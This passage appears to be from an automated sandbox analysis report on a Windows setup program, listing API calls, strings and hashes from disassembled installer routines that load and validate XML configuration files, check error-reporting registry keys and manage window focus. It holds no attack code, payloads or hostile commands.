                                                                                              • String ID: Failed to initialize items information. engineDataProvider.InitializeItems() returned false
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C7882
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,6C8C781A,?,6C8F831D,00000000), ref: 6C8C78B2
                                                                                              • RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,6C8F831D,00000000), ref: 6C8C78D8
                                                                                              • RegCloseKey.ADVAPI32(?,?,6C8F831D,00000000), ref: 6C8C78E4
                                                                                              • GetFileAttributesW.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C78F9
                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,?,?,6C8F831D,00000000), ref: 6C8C790E
                                                                                              • GetFileAttributesW.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C7931
                                                                                              • GetFileAttributesW.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C798A
                                                                                              Strings
                                                                                              • DW0200, xrefs: 6C8C78C9
                                                                                              • DW\DW20.exe, xrefs: 6C8C795E
                                                                                              • \Microsoft Shared\DW\DW20.exe, xrefs: 6C8C791D
                                                                                              • Software\Microsoft\PCHealth\ErrorReporting\DW\Installed, xrefs: 6C8C78A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$CloseFolderH_prolog3OpenPathQueryValue
                                                                                              • String ID: DW0200$DW\DW20.exe$Software\Microsoft\PCHealth\ErrorReporting\DW\Installed$\Microsoft Shared\DW\DW20.exe
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394D92A
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D960
                                                                                              • GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D9BA
                                                                                              • PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DA0D
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6394DAAF
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000), ref: 6394DAD0
                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6394DB07
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DB38
                                                                                              • CloseHandle.KERNELBASE(?,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DBB5
                                                                                              Strings
                                                                                              • Could not find mandatory data file %s. This is a bad package., xrefs: 6394DB6E
                                                                                              • ReadXML failed to open XML file %s, with error %d, xrefs: 6394DA8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$H_prolog3Path$AllocCloseCombineException@8HandleModuleNamePointerReadRelativeStringThrow
                                                                                              • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8E4746
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8380: __EH_prolog3.LIBCMT ref: 6C8F8387
                                                                                                • Part of subcall function 6C8C388B: __EH_prolog3.LIBCMT ref: 6C8C3892
                                                                                                • Part of subcall function 6C8E4464: __EH_prolog3.LIBCMT ref: 6C8E446B
                                                                                                • Part of subcall function 6C8E4682: __EH_prolog3.LIBCMT ref: 6C8E4689
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C8E47F7
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,?,?,?,6C8C3864,?,00000000,00000000,6C8FFA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 6C8E4815
                                                                                                • Part of subcall function 6C909D05: GetCommandLineW.KERNEL32(38D98A99,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 6C909D54
                                                                                              • CoUninitialize.COMBASE(02F92298,00000000,?,?,succeeded,6C8BA794,?,?,?,?,6C8C3864,?,00000000,00000000,6C8FFA6E,00000738), ref: 6C8E48F0
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 6C8E48F9
                                                                                              • SysAllocString.OLEAUT32(?), ref: 6C8E492E
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E49BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$String$AllocCommandCreateException@8FreeH_prolog3_catchInitializeInstanceLineThrowUninitialize
                                                                                              • String ID: IronMan::EngineData::CreateEngineData$ParameterInfo.xml$succeeded$threw exception
                                                                                              • API String ID: 1482071144-3644667230
                                                                                              • Opcode ID: 6a9c87901c6da982a76763894a092b3d476ab1863d80f0fada53a03cb2a62a9e
                                                                                              • Instruction ID: 933f730909b9000a7d2c68373fbe2a8cd1175c7e3f79824ccf70e611b4d47044
                                                                                              • Opcode Fuzzy Hash: 6a9c87901c6da982a76763894a092b3d476ab1863d80f0fada53a03cb2a62a9e
                                                                                              • Instruction Fuzzy Hash: 56816A70900249EFCB10DFE8C984ADE7BB9AF8A318F108959F418EB741C775DA05CBA1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639531A7
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • _wcschr.LIBCMT ref: 639531E8
                                                                                              • __CxxThrowException@8.LIBCMT ref: 639532A2
                                                                                                • Part of subcall function 6396DBDB: RaiseException.KERNEL32(?,?,63969236,?,?,?,?,?,63969236,?,63977F54,639822B4), ref: 6396DC1D
                                                                                              • PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,63966F33,?,?,00000000,00000044,6396668B,?,00000000,00000000,?,?,succeeded), ref: 639532B9
                                                                                              • PathFileExistsW.SHLWAPI(00000000,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 639532C6
                                                                                              • PathFileExistsW.KERNELBASE(?,00000000,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 63953307
                                                                                              • PathFileExistsW.KERNELBASE(?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 6395330A
                                                                                                • Part of subcall function 6394CA39: __EH_prolog3.LIBCMT ref: 6394CA40
                                                                                                • Part of subcall function 6394CAC2: __EH_prolog3.LIBCMT ref: 6394CAC9
                                                                                                • Part of subcall function 6394D170: __EH_prolog3.LIBCMT ref: 6394D177
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Path$ExistsFile$ExceptionException@8RaiseRelativeThrow_wcschr
                                                                                              • String ID: Successfuly found file %s $UIInfo.xml$UiInfo.xml has INVALID ResourceDLLName %s$^wu
                                                                                              • API String ID: 1926448744-3220900665
                                                                                              • Opcode ID: 451aa20cd6f1ebb7792ec9a53b26b2897ff0c2667a671846973b700e49af4341
                                                                                              • Instruction ID: ae15d62e4608942f40c0d6b654a64901e00f8d54d5b4264faeb7b08ed0eb2cdc
                                                                                              • Opcode Fuzzy Hash: 451aa20cd6f1ebb7792ec9a53b26b2897ff0c2667a671846973b700e49af4341
                                                                                              • Instruction Fuzzy Hash: 18716BB1804249EFDF00DBF8C984ADEBBB8AF16B28F544555F410A7281DB30EA58CF61
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 6395BF93
                                                                                              • GetForegroundWindow.USER32 ref: 6395BFBB
                                                                                              • SetForegroundWindow.USER32(?), ref: 6395BFF4
                                                                                              • IsWindowVisible.USER32(?), ref: 6395BFD3
                                                                                                • Part of subcall function 6394B93E: __EH_prolog3.LIBCMT ref: 6394B945
                                                                                              • _memset.LIBCMT ref: 6395C021
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000000,?), ref: 6395C043
                                                                                              • GetMenuItemInfoW.USER32(00000000), ref: 6395C04A
                                                                                              • PostMessageW.USER32(?,0000067C,00000000,00000000), ref: 6395C080
                                                                                              Strings
                                                                                              • 0, xrefs: 6395C035
                                                                                              • WM_ACTIVATEAPP: Focus stealer's windows was NOT visible, taking back focus, xrefs: 6395BFE3
                                                                                              • WM_ACTIVATEAPP: Focus stealer's windows WAS visible, NOT taking back focus, xrefs: 6395BFFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundMenu$H_prolog3InfoItemLongMessagePostSystemVisible_memset
                                                                                              • String ID: 0$WM_ACTIVATEAPP: Focus stealer's windows WAS visible, NOT taking back focus$WM_ACTIVATEAPP: Focus stealer's windows was NOT visible, taking back focus
                                                                                              • API String ID: 105400089-2282623533
                                                                                              • Opcode ID: 17b5cf17c1f15cba593a1caf0df74a0325649fe33f77aba3300e6fdcac7003c9
                                                                                              • Instruction ID: f95031b04abad85f80c1534831f58ee47b7d0605fc94a510af7520de4a64cda4
                                                                                              • Opcode Fuzzy Hash: 17b5cf17c1f15cba593a1caf0df74a0325649fe33f77aba3300e6fdcac7003c9
                                                                                              • Instruction Fuzzy Hash: E9212E32944209BFEF10AFB0DC09B893B68EB05BA5F148015FA15A91D1D7B1D5A0CFA9
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63966EE9
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 639531A0: __EH_prolog3.LIBCMT ref: 639531A7
                                                                                                • Part of subcall function 639531A0: _wcschr.LIBCMT ref: 639531E8
                                                                                                • Part of subcall function 639531A0: __CxxThrowException@8.LIBCMT ref: 639532A2
                                                                                                • Part of subcall function 639531A0: PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,63966F33,?,?,00000000,00000044,6396668B,?,00000000,00000000,?,?,succeeded), ref: 639532B9
                                                                                                • Part of subcall function 639531A0: PathFileExistsW.SHLWAPI(00000000,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 639532C6
                                                                                                • Part of subcall function 639545DE: __EH_prolog3.LIBCMT ref: 639545E5
                                                                                                • Part of subcall function 639560C9: __EH_prolog3.LIBCMT ref: 639560D0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Path$Exception@8ExistsFileRelativeThrow_wcschr
                                                                                              • String ID: ?$EulaPage$FinishPage$MaintenanceModePage$ProgressPage$ResourceDll$SystemRequirementsPage$WelcomePage$Windows
                                                                                              • API String ID: 1182493169-944454811
                                                                                              • Opcode ID: 13745b85b38b7000e796c1aec16195fb742c392789f39309448a2a236dba995c
                                                                                              • Instruction ID: 02d3e9af16454cad7d7ac3bf743b4bf1624b0c09d8c38414467514a93aff5efc
                                                                                              • Opcode Fuzzy Hash: 13745b85b38b7000e796c1aec16195fb742c392789f39309448a2a236dba995c
                                                                                              • Instruction Fuzzy Hash: A4F1797190024DEFEB01DBE8C944BDEBBB8AF19718F184099F154E7282DB35DA45DB21
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8DE315
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C8415: __EH_prolog3.LIBCMT ref: 6C8C841C
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8DE62B
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                                                              • String ID: ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$File$IsPresent$ParameterInfo.xml$schema validation failure: wrong number of File child nodes!
                                                                                              • API String ID: 3417717588-3917201069
                                                                                              • Opcode ID: a4a2adafceb54edc269d6919ac037db1be0e8f73bea6dc7eb386ea6b73aea8c0
                                                                                              • Instruction ID: b41bdfa146d3f3d4adea9bf7baf4549492861a681d9ac73797c67b4cc76c1a41
                                                                                              • Opcode Fuzzy Hash: a4a2adafceb54edc269d6919ac037db1be0e8f73bea6dc7eb386ea6b73aea8c0
                                                                                              • Instruction Fuzzy Hash: 44E17270A05249EFDB14CFA8CA44ADDBBB9BF19318F148959F424EB740C734EA09CB65
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E4AE0
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C89B7: __EH_prolog3.LIBCMT ref: 6C8C89BE
                                                                                                • Part of subcall function 6C8C89B7: __CxxThrowException@8.LIBCMT ref: 6C8C8A89
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E4E3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: Blockers$Configuration$EnterMaintenanceModeIf$Items$ParameterInfo.xml$Setup$SystemCheck$schema validation failure: wrong number of child elements under top level Setup element
                                                                                              • API String ID: 2489616738-3586895666
                                                                                              • Opcode ID: cb0450e0cb65f1f24edb1827d8e57da3aee7215f883060c810d9d321f4af17fb
                                                                                              • Instruction ID: 40679b67271e2f27193bb78b11c53b07685a331877c1614637302e42877f3af6
                                                                                              • Opcode Fuzzy Hash: cb0450e0cb65f1f24edb1827d8e57da3aee7215f883060c810d9d321f4af17fb
                                                                                              • Instruction Fuzzy Hash: 49C14E71A00249EFCB14DFE8CA45AEEBBB9AF59318F104959F424E7741C734DA09CB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D6447
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA1FF: __EH_prolog3_catch.LIBCMT ref: 6C8CA206
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D6666
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8C8415: __EH_prolog3.LIBCMT ref: 6C8C841C
                                                                                              Strings
                                                                                              • schema validation failure: If URL is present then there must be a DownloadSize, xrefs: 6C8D65DA
                                                                                              • HashValue, xrefs: 6C8D649E
                                                                                              • schema validation failure: If HashValue is present then it must be a 64 hex-digit string, xrefs: 6C8D667A
                                                                                              • CompressedHashValue, xrefs: 6C8D652C
                                                                                              • ParameterInfo.xml, xrefs: 6C8D65E8, 6C8D6688
                                                                                              • URL, xrefs: 6C8D6453
                                                                                              • DownloadSize, xrefs: 6C8D64E3
                                                                                              • CompressedDownloadSize, xrefs: 6C8D6571
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                                                                                              • String ID: CompressedDownloadSize$CompressedHashValue$DownloadSize$HashValue$ParameterInfo.xml$URL$schema validation failure: If HashValue is present then it must be a 64 hex-digit string$schema validation failure: If URL is present then there must be a DownloadSize
                                                                                              • API String ID: 24280941-3047338099
                                                                                              • Opcode ID: 6978fcde2a001e3a8d4627a26c4d346bcbe55876552088431377c5ab7b942f14
                                                                                              • Instruction ID: 85bd3db0b80d62bf4aee934abfa21510aa5c5f5028ca9e98fdbb602d23e502db
                                                                                              • Opcode Fuzzy Hash: 6978fcde2a001e3a8d4627a26c4d346bcbe55876552088431377c5ab7b942f14
                                                                                              • Instruction Fuzzy Hash: 19A16071904649DFCB20CFA8CA44AEEB7B9AF15318F144959F025EBB90C730EA09DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C906789
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C90988C: __EH_prolog3.LIBCMT ref: 6C909893
                                                                                                • Part of subcall function 6C90988C: GetCommandLineW.KERNEL32(0000002C,6C90D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9098B4
                                                                                                • Part of subcall function 6C90988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C90996E
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C9067DD
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,6C8FFA6E,?,?,?,UiInfo.xml,?,00000000,00000044,6C9036D8,02F92298,?,00000000), ref: 6C9067FB
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C906A24
                                                                                              • CoUninitialize.COMBASE(?,6C93BE00,?,?,?,UiInfo.xml,?,00000000,00000044,6C9036D8,02F92298,?,00000000,?), ref: 6C906A3A
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C906A43
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8PathRelativeThrow$CommandCreateFileFreeInitializeInstanceLineModuleNameStringUninitialize
                                                                                              • String ID: LCIDHints$ParameterInfo.xml$UiInfo.xml$Xml Document load failure
                                                                                              • API String ID: 2432735026-2443555527
                                                                                              • Opcode ID: 8f0971c2fb283957c318e584cd5a284664e9ac3bd98821a2309f6e4632644b0f
                                                                                              • Instruction ID: cab4aa3e07dccaf1a6e40f5497f92d4b5712eda7d6880d697766553020e1662e
                                                                                              • Opcode Fuzzy Hash: 8f0971c2fb283957c318e584cd5a284664e9ac3bd98821a2309f6e4632644b0f
                                                                                              • Instruction Fuzzy Hash: 1091AE71A00548EFCB00DFE8C984AEDBBB9AF59308F248599E415EBB40C735DE49DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C9F3B
                                                                                              • VariantInit.OLEAUT32(00000003), ref: 6C8C9F49
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8C9F83
                                                                                                • Part of subcall function 6C90964C: __get_errno.LIBCMT ref: 6C90966C
                                                                                                • Part of subcall function 6C90964C: __wcstoui64.LIBCMT ref: 6C90968F
                                                                                                • Part of subcall function 6C90964C: __get_errno.LIBCMT ref: 6C9096A1
                                                                                              • __ui64tow_s.LIBCMT ref: 6C8C9FEF
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CA0BC
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 6C8CA0C2
                                                                                              • VariantClear.OLEAUT32(?), ref: 6C8CA0E9
                                                                                              Strings
                                                                                              • Name, xrefs: 6C8CA121
                                                                                              • schema validation failure: %s is invalid, a non-negitive numeric value is required for %s, xrefs: 6C8CA03C
                                                                                              • schema validation failure: attribute %s missing for %s %s, xrefs: 6C8CA17B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: StringVariant__get_errno$AllocClearException@8FreeH_prolog3InitThrow__ui64tow_s__wcstoui64
                                                                                              • String ID: Name$schema validation failure: %s is invalid, a non-negitive numeric value is required for %s$schema validation failure: attribute %s missing for %s %s
                                                                                              • API String ID: 1723289333-1070666262
                                                                                              • Opcode ID: 9e4c4a18927ed7f854d110c11b7cd493e594d1310a29204356e3fea9bcb275b1
                                                                                              • Instruction ID: 35ac64053a027242cb4f9b9f8aacf94a164f989871a29e81c90f570c5b987bb3
                                                                                              • Opcode Fuzzy Hash: 9e4c4a18927ed7f854d110c11b7cd493e594d1310a29204356e3fea9bcb275b1
                                                                                              • Instruction Fuzzy Hash: 23919C71A00248EFCF11CFE8C944ADEBBB5BF19318F14495AE415ABB91CB30DA08DB61
                                                                                              APIs
